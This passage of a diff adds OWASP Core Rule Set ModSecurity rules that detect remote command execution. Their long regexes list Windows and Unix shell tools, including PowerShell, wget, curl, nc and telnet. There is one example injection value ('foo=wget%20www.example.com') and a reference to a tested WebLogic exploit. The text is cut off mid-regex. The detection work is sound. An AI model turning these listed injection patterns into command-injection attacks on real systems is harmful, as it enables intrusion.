2.2 requires configuration file lines to be under 8kB. +# Therefore, some remaining commands have been split off to a separate rule. +# For explanation of this rule, see rule 932110. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* +# [regexp assembled from util/regexp-assemble/regexp-932110.txt] +# (?:\.[\"\^]*\w+)?\b" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|h[\"\^]*o[\"\^]*a[\"\^]*m[\"\^]*i|g[\"\^]*e[\"\^]*t)|u[\"\^]*(?:s[\"\^]*(?:e[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*t[\"\^]*r[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s|r[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|n[\"\^]*(?:r[\"\^]*a[\"\^]*r|z[\"\^]*i[\"\^]*p))|q[\"\^]*(?:u[\"\^]*e[\"\^]*r[\"\^]*y[\"\^]*(?:[\s,;]|\.|/|<|>).*|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a|g[\"\^]*r[\"\^]*e[\"\^]*p)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*(?:a[\"\^]*d[\"\^]*3[\"\^]*2|c[\"\^]*o[\"\^]*n[\"\^]*f)|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|v[\"\^]*(?:o[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y)|x[\"\^]*c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|o[\"\^]*p[\"\^]*y)|z[\"\^]*i[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*)(?:\.[\"\^]*\w+)?\b" \ + "id:932115,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows PowerShell, cmdlets and options ] +# +# Detect some common PowerShell commands, cmdlets and options. +# These commands should be relatively uncommon in normal text, but +# potentially useful for code injection. +# +# If you are not running Windows, it is safe to disable this rule. +# +# https://technet.microsoft.com/en-us/magazine/ff714569.aspx +# https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \ + "id:932120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\ + msg:'Remote Command Execution: Windows PowerShell Command Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'language-powershell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell expressions ] +# +# Detects the following patterns which are common in Unix shell scripts +# and one-liners: +# +# $(foo) Command substitution +# ${foo} Parameter expansion +# <(foo) Process substitution +# >(foo) Process substitution +# $((foo)) Arithmetic expansion +# +# Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \ + "id:932130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows FOR, IF commands ] +# +# This rule detects Windows command shell FOR and IF commands. +# If you are not running Windows, it is safe to disable this rule. +# +# Examples: +# +# FOR %a IN (set) DO +# FOR /D %a IN (dirs) DO +# FOR /F "options" %a IN (text|"text") DO +# FOR /L %a IN (start,step,end) DO +# FOR /R C:\dir %A IN (set) DO +# +# IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n +# IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2 +# IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2) +# +# http://ss64.com/nt/if.html +# http://ss64.com/nt/for.html +# +# Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do)" \ + "id:932140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,\ + msg:'Remote Command Execution: Windows FOR/IF Command Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix direct remote command execution ] +# +# Detects Unix commands at the start of a parameter (direct RCE). +# Example: foo=wget%20www.example.com +# +# This case is different from command injection (rule 932100), where a +# command string is appended (injected) to a regular parameter, and then +# passed to a shell unescaped. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# Due to a higher risk of false positives, the following changes have been +# made relative to rule 932100: +# 1) the set of commands is smaller +# 2) we require a trailing space (denoting command parameters) or command +# separator character after the command +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932150.txt] +# [\\\\'\"]*(?:\s|;|\||&|<|>)" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\